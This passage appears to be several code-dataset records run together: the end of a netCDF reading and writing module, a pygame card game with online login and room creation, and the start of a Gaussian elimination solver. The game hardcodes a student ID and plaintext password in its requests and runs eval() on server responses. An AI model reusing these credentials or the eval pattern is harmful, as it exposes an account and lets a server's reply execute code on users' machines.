NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n varlist: ``List``\n\n A Python list of variables within the netCDF-formatted file\n specified upon entry.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Collect the list of variables within the netCDF-formatted file.\n varlist = []\n for name, _ in ncfile.variables.items():\n varlist.append(name)\n\n return varlist\n\n\n# ----\n\n\ndef ncwrite(\n ncfile: str,\n ncdim_obj: object,\n ncvar_obj: object,\n ncfrmt: str = None,\n glbattrs_dict: Dict = None,\n) -> None:\n \"\"\"\n Description\n -----------\n\n This function writes a netCDF-formatted file, containing the\n specified dimensions, variables, and (optional) attributes.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file (to be\n created).\n\n ncdim_obj: ``object``\n\n A Python object containing the dimension variable attributes\n for the netCDF-formatted file (to be created).\n\n ncvar_obj: ``object``\n\n A Python object containing the variable attributes for the\n netCDF-formatted file (to be created).\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n glbattrs_dict: ``Dict``, optional\n\n A Python dictionary containing global attribute values; the\n dictionary keys are the global attribute names while the\n dictionary values are the corresponding key values.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"w\", format=ncfrmt)\n\n # Define the netCDF attibutes and proceed accordingly.\n ncdim_dict = __read_ncdim_obj__(ncdim_obj=ncdim_obj)\n ncvar_dict = __read_ncvar_obj__(ncvar_obj=ncvar_obj)\n for key, value in ncdim_dict.items():\n ncfile.createDimension(key, value)\n\n # Build the netCDF-formatted file and write each variable.\n for key, value in ncvar_dict.items():\n try:\n var_dict = value\n if var_dict[\"type\"].lower() == \"char\":\n datatype = str\n else:\n datatype = parser_interface.object_getattr(\n object_in=numpy, key=var_dict[\"type\"]\n )\n var = ncfile.createVariable(\n varname=var_dict[\"varname\"],\n datatype=datatype,\n dimensions=var_dict[\"dims\"],\n )\n if \"attrs\" in var_dict.keys():\n attr_dict = parser_interface.dict_key_value(\n dict_in=var_dict, key=\"attrs\"\n )\n for attr in attr_dict.keys():\n value = parser_interface.dict_key_value(\n dict_in=attr_dict, key=attr, no_split=True\n )\n var = parser_interface.object_setattr(\n object_in=var, key=attr, value=value\n )\n vallist = numpy.reshape(list(map(datatype, var_dict[\"values\"])), var.shape)\n var[:] = numpy.array(vallist, dtype=datatype)\n except TypeError:\n pass\n\n # Check whether to append the file with global attributes; proceed\n # accordingly.\n if glbattrs_dict is not None:\n # Define the global attributes for the netCDF-formatted file.\n for glbattr in glbattrs_dict:\n value = parser_interface.dict_key_value(\n dict_in=glbattrs_dict, key=glbattr, no_split=True\n )\n ncfile = parser_interface.object_setattr(\n object_in=ncfile, key=glbattr, value=value\n )\n\n # Close the open netCDF-formatted file.\n ncfile.close()\n\n\n# ----\n\n\ndef ncwritevar(\n ncfile: str, ncvarname: str, ncvar: numpy.array, ncfrmt: str = None\n) -> None:\n \"\"\"\n Description\n -----------\n\n This function opens a netCDF-formatted file and writes the array\n (`ncvar`) values for the specified variable to the respective\n (open) netCDF-formatted file.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n written to.\n\n ncvarname: ``str``\n\n A Python string specifying the netCDF variable to be\n written/updated.\n\n ncvar: ``numpy.array``\n\n A Python array containing the values for the specified netCDF\n variable.\n\n Keywords\n --------\n\n ncfrmt: ``str,`` optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"a\", format=ncfrmt)\n\n # Write the specified variable to the specified netCDF-formatted\n # file.\n for name, _ in ncfile.variables.items():\n if ncvarname == name:\n ncfile.variables[ncvarname][:] = ncvar\n","repo_name":"HenryWinterbottom-NOAA/ufs_pyutils","sub_path":"ioapps/netcdf4_interface.py","file_name":"netcdf4_interface.py","file_ext":"py","file_size_in_byte":40363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21152243306","text":"# coding=gbk\n# 伍浪\n# 加油冲冲冲\nimport sys\nimport pygame\nimport random\nimport time\nimport pygame.locals\nimport pygame.freetype\nimport requests\nimport tkinter\nimport tkinter.messagebox#弹窗库\npygame.init()\nd = {'fangkuai01': pygame.image.load('pokes/fangkuai1.jpg'), #将扑克牌图片放入字典,方便调用显示\n 'fangkuai02': pygame.image.load('pokes/fangkuai2.jpg'),\n 'fangkuai03': pygame.image.load('pokes/fangkuai3.jpg'),\n 'fangkuai04': pygame.image.load('pokes/fangkuai4.jpg'),\n 'fangkuai05': pygame.image.load('pokes/fangkuai5.jpg'),\n 'fangkuai06': pygame.image.load('pokes/fangkuai6.jpg'),\n 'fangkuai07': pygame.image.load('pokes/fangkuai7.jpg'),\n 'fangkuai08': pygame.image.load('pokes/fangkuai8.jpg'),\n 'fangkuai09': pygame.image.load('pokes/fangkuai9.jpg'),\n 'fangkuai10': pygame.image.load('pokes/fangkuai10.jpg'),\n 'fangkuai11': pygame.image.load('pokes/fangkuai11.jpg'),\n 'fangkuai12': pygame.image.load('pokes/fangkuai12.jpg'),\n 'fangkuai13': pygame.image.load('pokes/fangkuai13.jpg'),\n 'heitao01': pygame.image.load('pokes/heitao1.jpg'),\n 'heitao02': pygame.image.load('pokes/heitao2.jpg'),\n 'heitao03': pygame.image.load('pokes/heitao3.jpg'),\n 'heitao04': pygame.image.load('pokes/heitao4.jpg'),\n 'heitao05': pygame.image.load('pokes/heitao5.jpg'),\n 'heitao06': pygame.image.load('pokes/heitao6.jpg'),\n 'heitao07': pygame.image.load('pokes/heitao7.jpg'),\n 'heitao08': pygame.image.load('pokes/heitao8.jpg'),\n 'heitao09': pygame.image.load('pokes/heitao9.jpg'),\n 'heitao10': pygame.image.load('pokes/heitao10.jpg'),\n 'heitao11': pygame.image.load('pokes/heitao11.jpg'),\n 'heitao12': pygame.image.load('pokes/heitao12.jpg'),\n 'heitao13': pygame.image.load('pokes/heitao13.jpg'),\n 'hongtao01': pygame.image.load('pokes/hongtao1.jpg'),\n 'hongtao02': pygame.image.load('pokes/hongtao2.jpg'),\n 'hongtao03': pygame.image.load('pokes/hongtao3.jpg'),\n 'hongtao04': pygame.image.load('pokes/hongtao4.jpg'),\n 'hongtao05': pygame.image.load('pokes/hongtao5.jpg'),\n 'hongtao06': pygame.image.load('pokes/hongtao6.jpg'),\n 'hongtao07': pygame.image.load('pokes/hongtao7.jpg'),\n 'hongtao08': pygame.image.load('pokes/hongtao8.jpg'),\n 'hongtao09': pygame.image.load('pokes/hongtao9.jpg'),\n 'hongtao10': pygame.image.load('pokes/hongtao10.jpg'),\n 'hongtao11': pygame.image.load('pokes/hongtao11.jpg'),\n 'hongtao12': pygame.image.load('pokes/hongtao12.jpg'),\n 'hongtao13': pygame.image.load('pokes/hongtao13.jpg'),\n 'meihua01': pygame.image.load('pokes/meihua1.jpg'),\n 'meihua02': pygame.image.load('pokes/meihua2.jpg'),\n 'meihua03': pygame.image.load('pokes/meihua3.jpg'),\n 'meihua04': pygame.image.load('pokes/meihua4.jpg'),\n 'meihua05': pygame.image.load('pokes/meihua5.jpg'),\n 'meihua06': pygame.image.load('pokes/meihua6.jpg'),\n 'meihua07': pygame.image.load('pokes/meihua7.jpg'),\n 'meihua08': pygame.image.load('pokes/meihua8.jpg'),\n 'meihua09': pygame.image.load('pokes/meihua9.jpg'),\n 'meihua10': pygame.image.load('pokes/meihua10.jpg'),\n 'meihua11': pygame.image.load('pokes/meihua11.jpg'),\n 'meihua12': pygame.image.load('pokes/meihua12.jpg'),\n 'meihua13': pygame.image.load('pokes/meihua13.jpg')}\nnewpai = ['fangkuai01','fangkuai02','fangkuai03','fangkuai04','fangkuai05','fangkuai06','fangkuai07','fangkuai08','fangkuai09',\n 'fangkuai10','fangkuai11','fangkuai12','fangkuai13','heitao01','heitao02','heitao03','heitao04','heitao05',\n 'heitao06','heitao07','heitao08','heitao09','heitao10','heitao11','heitao12','heitao13','hongtao01','hongtao02',\n 'hongtao03','hongtao04','hongtao05','hongtao06','hongtao07','hongtao08','hongtao09','hongtao10','hongtao11',\n 'hongtao12','hongtao13','meihua01','meihua02','meihua03','meihua04','meihua05','meihua06','meihua07','meihua08',\n 'meihua09','meihua10','meihua11','meihua12','meihua13']\n\nplayer1 = [] #初始化玩家一、玩家二(电脑)手牌,放置区、牌堆手牌\nplayer2 = []\nsetpoker = []\npai = newpai[:]\n\nturn = 1 #表示出牌方,1为玩家一,-1为玩家二或者电脑\ndef begin():\n pygame.init() # 初始化init()及设置\n size = width, height = 566, 565 # 与下面的图片的大小,如果不一致会导致图片显示不完全,或者产生缝隙\n black = 0, 0, 0\n screen = pygame.display.set_mode(size) # 窗口大小\n pygame.display.set_caption(\"用户登录\") # 窗口名字\n # icon=pygame.image.load(\"snake.jpg\")加载窗口图片\n # pygame.display.set_icon(icon)#设置窗口图片\n background = pygame.image.load(\"图片/backgroud.png\")\n RED = pygame.Color(\"red\")\n BLUE = pygame.Color(\"blue\")\n BLACK = pygame.Color(\"black\")\n GAINSBORO = pygame.Color(\"gainsboro\")\n WHITESMOKE = pygame.Color(\"whitesmoke\")\n MOCCASIN = pygame.Color(\"moccasin\")\n WHITE = pygame.Color(\"white\")\n # screen.fill(MOCCASIN)可以和下面的背景图二选一\n screen.blit(background, (0, 0))\n f1 = pygame.freetype.Font('C:\\Windows\\Fonts\\simkai.ttf', size=50) # 调出文字的字体\n f1.render_to(screen, [100, 150], \"用户名 :\", fgcolor=WHITE, bgcolor=None, size=30) # 强调文字\n f1.render_to(screen, [100, 210], \"密 码 :\", fgcolor=WHITE, bgcolor=None, size=30)\n pygame.draw.rect(screen, WHITESMOKE, (230, 150, 200, 35)) # 两个输入框的位置,但不是真正的输入框,只是显示效果,可以实现文字的显示\n pygame.draw.rect(screen, WHITESMOKE, (230, 210, 200, 35))\n a, b = [], [] # 创建两个空列表,用来分别存储用户名和密码\n while True:\n # 为了实现鼠标移到按钮处,改变颜色,需要不断重绘鼠标不在按钮处时的按钮\n dl = f1.render_to(screen, [100, 400], \"登记\", fgcolor=BLACK, bgcolor=WHITESMOKE, size=50)\n zc = f1.render_to(screen, [400, 400], \"登录\", fgcolor=BLACK, bgcolor=WHITESMOKE, size=50)\n # 事件检测\n Flag = False\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n elif event.type == pygame.locals.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos() # 鼠标的点击位置\n if 230 <= mouse_x <= 430 and 150 <= mouse_y <= 185: # 判断点击了哪一个输入框\n pygame.draw.rect(screen, WHITE, (230, 150, 200, 35))\n pygame.draw.rect(screen, WHITESMOKE, (230, 210, 200, 35))\n wz = True # 用于改变后文文字输入显示的位置\n elif 230 <= mouse_x <= 430 and 210 <= mouse_y <= 245:\n pygame.draw.rect(screen, WHITE, (230, 210, 200, 35))\n pygame.draw.rect(screen, WHITESMOKE, (230, 150, 200, 35))\n wz = False\n elif 400 < mouse_x < 400 + dl[2] and 400 < mouse_y < 400 + dl[3]:\n Flag = True\n print(\"登录成功!\") # 判断按钮点击的位置是否是在登录按钮的区域内\n elif event.type == pygame.KEYDOWN: # 检测按键是否是数字键,通过打印输3出判断按键的码\n if wz and len(a) < 13: # 限制输入的长度,利用WZ来更改输入内容的显示位置\n a.append(event.unicode)\n elif wz == False and len(b) < 13:\n b.append(event.unicode)\n str_a = \"\" # 将输入内容存储到列表\n for i in a:\n str_a += str(i) # 转化拼接为字符串\n str_b = \"\"\n for i in b:\n str_b += str(i)\n url = \"http://172.17.173.97:8080/api/user/login\"\n payload = {'student_id': str_a,\n 'password': str_b}\n files = [\n ]\n headers = {}\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n s = eval(response.text)\n # 显示字符串\n f1.render_to(screen, [235, 159], str_a, fgcolor=BLACK, bgcolor=WHITE, size=30)\n f1.render_to(screen, [235, 219], str_b, fgcolor=BLACK, bgcolor=WHITE, size=30)\n x, y = pygame.mouse.get_pos() # 判断鼠标移动到那个位置了,更改文字的背景色,文字的���示区域是一个矩形\n if x > 100 and y > 400 and x < 100 + zc[2] and y < 400 + zc[3]:\n f1.render_to(screen, [100, 400], \"登记\", fgcolor=BLACK, bgcolor=GAINSBORO, size=50)\n elif x > 400 and y > 400 and x < 400 + dl[2] and y < 400 + dl[3]:\n f1.render_to(screen, [400, 400], \"登录\", fgcolor=BLACK, bgcolor=GAINSBORO, size=50)\n pygame.display.update()\n if Flag == True and s['message'] == 'Success':\n\n return s['data']['token']\n sys.exit()\nfrom tkinter import *\n\nclass MyDialog:\n def __init__(self, parent):\n\n top = self.top = Toplevel(parent)\n\n Label(top, text=\"请输入房间号\").pack()\n\n self.e = Entry(top)\n self.e.pack(padx=5)\n b = Button(top, text=\"OK\", command=self.ok)\n b.pack(pady=5)\n def ok(self):\n root = tkinter.Tk()\n root.withdraw()\n tkinter.messagebox.showinfo('提示', '加入房间成功!')\n self.top.destroy()\nclass choose():\n global token_\n global uuid_\n def __init__(self,token):\n pygame.init()\n pygame.display.set_caption('在线对战')\n screen = pygame.display.set_mode((1400, 750))\n background = pygame.image.load('图片/backgroud.png')\n screen.blit(background, (0, 0))\n botton1=pygame.image.load('按钮/按钮1.png')\n botton2=pygame.image.load('按钮/按钮2.png')\n botton3= pygame.image.load('按钮/按钮3.png')\n botton4 = pygame.image.load('按钮/按钮4.png')\n screen.blit(botton1,(450,400))\n screen.blit(botton2,(450,520))\n screen.blit(botton3, (800, 400))\n screen.blit(botton4, (800, 520))\n self.botton1_area=pygame.Rect(460, 411, 155,60)\n self.botton2_area = pygame.Rect(469,526,150,60)\n self.mouse_position=''\n self.token=token\n self.uudi=''\n def uuid1(self):\n return self.uudi\n def get_uuid(self,token):\n url = \"http://172.17.173.97:9000/api/game\"\n payload = {'student_id': '031902129',\n 'password': 'yuanyuan520'}\n files = [\n ]\n headers = {\n 'Authorization': token}\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n s = eval(response.text)\n if s['msg'] == '操作成功':\n root = tkinter.Tk()\n root.withdraw()\n tkinter.messagebox.showinfo('提示', '你创建的房间号为:' + str(s['data']['uuid']))\n\n return s['data']['uuid']\n def join_uuid(self,token):\n url = \"http://172.17.173.97:9000/api/game/\"+str(self.uuid)\n payload = {'student_id': '031902129',\n 'password': 'yuanyuan520'}\n files = [\n ]\n headers = {\n 'Authorization':token\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n s = eval(response.text)\n if s['msg'] == '操作成功':\n root = Tk()\n Button(root, text=\"Hello!\").pack()\n root.update()\n\n d = MyDialog(root)\n\n root.wait_window(d.top)\n root.mainloop()\n pygame.display.update()\n\n def run_game(self):\n Flag=False\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.mouse_position = pygame.mouse.get_pos()\n print(event.pos)\n if self.botton1_area.collidepoint(self.mouse_position):\n self.uuid=self.get_uuid(self.token)\n print(self.uuid)\n\n if self.botton2_area.collidepoint(self.mouse_position):\n try:\n pygame.quit()\n self.join_uuid(self.token)\n except:\n root = tkinter.Tk()\n root.withdraw()\n tkinter.messagebox.showinfo('提示', '还未创建房间!' )\n\n\n\n pygame.display.flip()\nclass begingame: #模式选择,规则说明\n def __init__(self):\n pygame.init()\n self.rule = 0\n pygame.display.set_caption(\"猪尾巴\")\n self.screen = pygame.display.set_mode((1400, 750))\n self.begingame = pygame.image.load('图片/开始游戏.png')\n self.typeselect = pygame.image.load('图片/模式选择.png')\n self.rule1 = pygame.image.load('图片/规则1.png')\n self.rule2 = pygame.image.load('图片/规则2.png')\n self.beginarea = pygame.Rect(584, 640, 236, 72)\n self.pve = pygame.Rect(580, 400, 270, 90)\n self.pvp = pygame.Rect(580, 515, 270, 90)\n self.net = pygame.Rect(580, 630, 270, 90)\n self.rulearea = pygame.Rect(1230, 0, 170, 60)\n self.returnarea1 = pygame.Rect(0, 0, 175, 65)\n self.returnarea2 = pygame.Rect(1220, 0, 280, 70)\n self.changerulearea = pygame.Rect(1224, 682, 176, 68)\n self.s = 1\n\n def update(self):\n if self.s == 1:\n if self.rule == 1:\n self.screen.blit(self.rule1, (0, 0))\n elif self.rule == 2:\n self.screen.blit(self.rule2, (0, 0))\n else:\n self.screen.blit(self.begingame, (0, 0))\n else:\n self.screen.blit(self.typeselect, (0, 0))\n\n def mouse(self, xy):\n if self.s == 1:\n if self.rulearea.collidepoint(xy) and self.rule == 0:\n self.rule = 1\n elif self.changerulearea.collidepoint(xy) and self.rule == 1:\n self.rule = 2\n elif self.changerulearea.collidepoint(xy) and self.rule == 2:\n self.rule = 1\n elif self.returnarea1.collidepoint(xy) and self.rule != 0:\n self.rule = 0\n elif self.beginarea.collidepoint(xy) and self.rule == 0:\n self.s = 2\n self.update()\n elif self.s == 2:\n if self.pvp.collidepoint(xy): #双人模式\n self.ai = Cardgame()\n self.ai.run_game()\n if self.pve.collidepoint(xy): #人机模式\n self.ai=Cardgame()\n self.ai.pve()\n self.ai.run_game()\n if self.net.collidepoint(xy):\n a = choose(begin())\n a.run_game()\n\n ##############\n if self.returnarea2.collidepoint(xy):\n self.s = 1\n\n def runbegin(self):\n while True:\n self.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.mouse(event.pos)\n pygame.display.flip()\n\n\nclass Cardgame: #真正的游戏类\n def __init__(self):\n pygame.init()\n pygame.display.set_caption(\"猪尾巴\")\n self.screen = pygame.display.set_mode((1400, 750))\n self.background = pygame.image.load('图片/backgroud.png')\n self.screen.blit(self.background, (0, 0))\n self.cardpile = pygame.image.load('图片/牌堆.png') # 更改了牌堆和放置区的名称,方便后续更新画面\n self.cadempty = pygame.image.load('图片/空牌堆.png') # 空牌堆\n self.screen.blit(self.cardpile, (260, 255))\n self.cardset = pygame.image.load('图片/放置区.png')\n self.screen.blit(self.cardset, (950, 255))\n self.area = pygame.Rect(280, 316, 123, 151)\n self.fire1area = pygame.Rect(620, 476, 130, 64)\n self.fire2area = pygame.Rect(620, 210, 130, 64)\n self.again_area = pygame.Rect(470, 580, 180, 80)\n self.return_area = pygame.Rect(720, 580, 180, 80)\n self.player1auto = pygame.Rect(972, 542, 152, 55)\n self.player2auto = pygame.Rect(282, 175, 152, 55)\n self.firebotton = pygame.image.load('按钮/出牌.png')\n self.newcard = pygame.image.load('图片/放置区.png') # 放置区最外面一张牌\n self.bequick = pygame.image.load('按钮/快出牌.png')\n self.auto = pygame.image.load('按钮/托管.png')\n self.notauto =pygame.image.load('按钮/取消托管.png')\n self.win1 = pygame.image.load('图片/player1win.png')\n self.win2 = pygame.image.load('图片/player2win.png')\n self.draw = pygame.image.load('图片/平局.png')\n self.again_game = pygame.image.load('按钮/再来一局.png')\n self.return_game = pygame.image.load('按钮/返回主菜单.png')\n self.player2image =pygame.image.load('图片/头像机器人.png')\n self.player1image =pygame.image.load('图片/农民.png')\n self.player1name = pygame.image.load('按钮/玩家一.png')\n self.player2name = pygame.image.load('按钮/玩家二.png')\n self.autoname = pygame.image.load('按钮/阿尔发.png')\n self.font = pygame.font.Font(None, 40)\n self.text = self.font.render(f'cards:{len(pai)}', True, (0, 0, 0), (255, 255, 255))\n self.lnewcard = '' # 新的newcard\n self.ischupai = 0 # 判断是否出牌\n self.ifauoto=0\n self.chupai = -1 #第几张牌,-1表示没出牌\n self.istrusteeship1 = False #表示是否托管\n self.istrusteeship2 = False\n self.tuopai=1 #判断托管是否应该出牌,1为出,0为不出\n def pve(self): #人机模式 #人机模式的额外初始化,在模式选择时候调用\n self.istrusteeship2=True\n self.ifauoto=1 #代表人机模式\n\n def reset(self, lst): #摸牌操作\n random.shuffle(lst)\n self.newcard = lst[-1] # 记录放置区最上面的牌\n setpoker.append(lst.pop()) # 将牌堆弹出的牌放入放置区队列,同时记录这张牌\n global turn\n self.eatcard(setpoker)\n turn = -turn # 换玩家出牌\n\n def eatcard(self, lst): #判断吃牌\n global turn\n if len(lst) > 1:\n if lst[-1][0:2] == lst[-2][0:2]: # 判断牌名前三个字符一样即可\n if (turn == 1):\n player1.extend(lst)\n elif (turn == -1):\n player2.extend(lst)\n lst.clear()\n self.newcard=''\n self.lnewcard=''\n\n def update(self): # 更新屏幕\n global turn\n self.screen.blit(self.background, (0, 0))\n self.screen.blit(self.player1image,(10,600))\n self.screen.blit(self.player2image,(1250,10))\n self.screen.blit(self.cardset, (950, 255))\n self.screen.blit(self.player1name,(17,542))\n if self.istrusteeship1==1:\n self.screen.blit(self.notauto,(972,542))\n else:\n self.screen.blit(self.auto, (972, 542))\n if self.ifauoto==0:\n self.screen.blit(self.player1image, (1250, 10))\n self.screen.blit(self.player2name, (1257, 175))\n if self.istrusteeship2 == 1:\n self.screen.blit(self.notauto, (282, 175))\n else:\n self.screen.blit(self.auto, (282, 175))\n else:\n self.screen.blit(self.player2image, (1250, 10))\n self.screen.blit(self.autoname, (1257, 175))\n if len(pai) != 0:\n self.screen.blit(self.cardpile, (260, 255))\n else:\n self.screen.blit(self.cadempty, (260, 255))\n if self.chupai != -1 and turn == 1: # 开火\n self.screen.blit(self.firebotton, (620, 476))\n if self.chupai != -1 and turn == -1:\n self.screen.blit(self.firebotton, (620, 210))\n if len(setpoker) != 0:\n self.screen.blit(d[self.newcard], (980, 321)) #以上到这为基础显示\n\n self.text = self.font.render(f'cards:{len(pai)}', True, (0, 0, 0), (255, 255, 255)) #剩余牌数\n self.screen.blit(self.text, (120, 360))\n player1.sort() # 手牌排序\n player2.sort()\n l1 = (1400 - len(player1) * 20 - 85) / 2 #计算距离,用于手牌居中\n l2 = (1400 - len(player2) * 20 - 85) / 2\n if self.istrusteeship1==False:\n j=0 # 更新玩家1手牌区\n for i in player1: #非托管玩家一手牌显示\n if j == self.chupai and turn == 1:\n self.screen.blit(d[i], (j * 20 + l1, 560))\n else:\n self.screen.blit(d[i], (j * 20 + l1, 600))\n j = j + 1\n else:\n j = 0\n for i in player1: #托管时玩家一手牌显示\n self.screen.blit(d[i], (j * 20 + l1, 600))\n j = j + 1\n if self.istrusteeship2==False:\n j=0 # 更新玩家2手牌区\n for i in player2: #玩家二手牌显示\n if j == self.chupai and turn == -1:\n self.screen.blit(d[i], (j * 20+l2, 40))\n else:\n self.screen.blit(d[i], (j * 20+l2,0))\n j = j + 1\n else:\n j = 0\n for i in player2: #电脑或玩家二托管时手牌显示\n self.screen.blit(d[i], (j * 20+l2, 0))\n j = j + 1\n\n if turn == 1: #出牌提醒按键\n self.screen.blit(self.bequick, (282, 542))\n else:\n self.screen.blit(self.bequick, (972, 175))\n\n if len(pai) == 0: #胜利结算\n if (len(player1) < len(player2)):\n self.screen.blit(self.win1, (470, 190))\n elif (len(player1)>len(player2)):\n self.screen.blit(self.win2, (470, 190))\n else:\n self.screen.blit(self.draw,(470,190))\n self.screen.blit(self.again_game, (470, 580))\n self.screen.blit(self.return_game, (720, 580))\n\n def renew(self): #一局游戏结束后初始化各个牌组及参数\n global pai\n global setpoker\n global player1\n global player2\n self.chupai=-1\n pai = newpai[:]\n setpoker = []\n player1 = []\n player2 = []\n\n def mouse(self, xy): # 判断鼠标操作,为鼠标坐标\n turnchange = 0\n global turn\n x = xy[0]\n y = xy[1]\n if self.player1auto.collidepoint(xy): #玩家一托管与取消托管\n if self.istrusteeship1==False:\n self.istrusteeship1 = True\n else:\n self.istrusteeship1 =False\n self.update()\n elif self.player2auto.collidepoint(xy) and self.ifauoto==0: #双人时玩家二托管与取消托管\n if self.istrusteeship2==False:\n self.istrusteeship2 = True\n else:\n self.istrusteeship2 =False\n self.update()\n\n else:\n if self.area.collidepoint(xy) and len(pai) != 0: #抽牌\n self.reset(pai)\n self.eatcard(setpoker)\n self.chupai = -1 # 换人把出牌恢复\n if self.fire1area.collidepoint(xy) and self.chupai != -1 and turn == 1: #玩家一出牌\n if len(player1) != 0:\n setpoker.append(player1[self.chupai])\n self.newcard = player1.pop(self.chupai)\n self.chupai = -1\n self.eatcard(setpoker)\n turn=-turn\n if self.fire2area.collidepoint(xy) and self.chupai != -1 and turn == -1: #电脑或玩家二出牌\n if len(player2) != 0:\n setpoker.append(player2[self.chupai])\n self.newcard = player2.pop(self.chupai)\n self.chupai = -1\n self.eatcard(setpoker)\n turn=-turn\n l1 = (1400 - len(player1) * 20 - 85) / 2 #轮到玩家一时判断点的第几张牌,突出显示\n if x < len(player1) * 20 + 85 + l1 and 600 < y < 750 and turn == 1 and self.istrusteeship1 ==False:\n if x <= len(player1) * 20 + l1:\n self.ifchupai = int((x - l1) // 20)\n else:\n self.ifchupai = len(player1) - 1\n if self.ifchupai == self.chupai:\n self.chupai = -1\n else:\n self.chupai = self.ifchupai\n l2 = (1400 - len(player2) * 20 - 85) / 2 #轮到玩家二时判断点的第几张牌,突出显示\n if x < len(player2) * 20 + 85 + l2 and 0 < y < 150 and turn == -1 and self.istrusteeship2 == False:\n if x <= len(player2) * 20 + l2:\n self.ifchupai = int((x - l2) // 20)\n else:\n self.ifchupai = len(player2) - 1\n if self.ifchupai == self.chupai:\n self.chupai = -1\n else:\n self.chupai = self.ifchupai\n self.update()\n\n def tuoguan(self): #托管或机器\n self.tuopai=1\n if turn == 1:\n if len(player1)==0 and len(pai)!=0:\n self.reset(pai)\n self.chupai = -1\n self.update()\n time.sleep(0.3)\n else:\n self.trusteeship(player1)\n if self.tuopai==0:\n self.reset(pai)\n self.chupai = -1\n self.update()\n time.sleep(0.3)\n if self.tuopai==1:\n self.secondcard()\n self.update()\n time.sleep(0.3)\n else:\n if len(player2) == 0 and len(pai) != 0:\n self.reset(pai)\n self.chupai = -1\n self.update()\n time.sleep(0.3)\n else:\n self.trusteeship(player2)\n if self.tuopai == 0:\n self.reset(pai)\n self.chupai = -1\n self.update()\n time.sleep(0.3)\n if self.tuopai == 1:\n self.secondcard()\n self.update()\n time.sleep(0.3)\n\n\n def run_game(self):\n \"\"\"开始游戏的主循环\"\"\"\n self.update()\n Flag = True\n while Flag == True:\n if self.istrusteeship1 == True and turn == 1 and len(pai)!=0: #判断托管及人机对战\n self.tuoguan()\n elif self.istrusteeship2 == True and turn == -1 and len(pai)!=0:\n self.tuoguan()\n for event in pygame.event.get(): #鼠标操作\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.mouse(event.pos) # 鼠标事件,调用mouse函数\n if len(pai) == 0 and self.return_area.collidepoint(event.pos):\n Flag = False # 把停止先停了,看下结算界面\n self.renew()\n if len(pai) == 0 and self.again_area.collidepoint(event.pos):\n self.renew()\n self.update()\n pygame.display.flip()\n\n def secondcard(self): #处理自动或托管模式下打出的牌\n global turn\n if self.istrusteeship1==True and turn == 1: #玩家一托管更新打出的那张牌\n self.newcard = self.lnewcard\n setpoker.append(self.newcard)\n player1.remove(self.newcard)\n elif self.istrusteeship2==True and turn == -1 : #玩家二托管更新打出的那张牌\n self.newcard = self.lnewcard\n setpoker.append(self.newcard)\n player2.remove(self.newcard)\n turn = -turn\n\n def trusteeship(self, lst): # 判断自动模式下应该打出的那张牌或者选择摸牌\n new_card = ''\n max1=''\n dict = {'count_meihua': 0, 'count_fangkuai': 0, 'count_hongtao': 0, 'count_heitao': 0}\n #if len(lst) == 0:\n # self.reset(lst)\n for item in lst:\n if item[4] == 'u':\n dict['count_meihua'] += 1\n elif item[4] == 'k':\n dict['count_fangkuai'] += 1\n elif item[4] == 't':\n dict['count_hongtao'] += 1\n else:\n dict['count_heitao'] += 1\n for k, v in dict.items():\n if v == max(dict.values()):\n max1 = k\n if turn==1 and (len(player1)+3*len(pai)+len(setpoker)-2) np.array:\n \"\"\"\n Solves the solution to Ax=b using the gaussian elimination method. This does pivot for the cases where there is a\n 0 along the diagonal of the matrix A.\n\n :param A: Matrix of coefficients\n :param b: Solution vector\n :return: The solution x of the linear system\n \"\"\"\n A, b = handle_arrays(A, b)\n n = len(b)\n\n # Set up scale factors\n s = np.zeros(n)\n for i in range(n):\n s[i] = max(np.abs(A[i, :]))\n\n for k in range(0, n - 1):\n # If needed, perform row interchange\n p = np.argmax(np.abs(A[k:n, k])/s[k:n]) + k\n if p != k:\n _row_interchange(b, k, p)\n _row_interchange(s, k, p)\n _row_interchange(A, k, p)\n\n # Elimination\n for i in range(k + 1, n):\n if A[i, k] != 0.0:\n lam = A[i, k]/A[k, k]\n A[i, k + 1:n] = A[i, k + 1:n] - lam*A[k, k + 1:n]\n b[i] = b[i] - lam*b[k]\n\n # Back Substitution\n b[n - 1] = b[n - 1]/A[n - 1, n - 1]\n for k in range(n - 2, -1, -1):\n b[k] = (b[k] - np.dot(A[k, k + 1:n], b[k + 1:n]))/A[k, k]\n return b\n\n\ndef 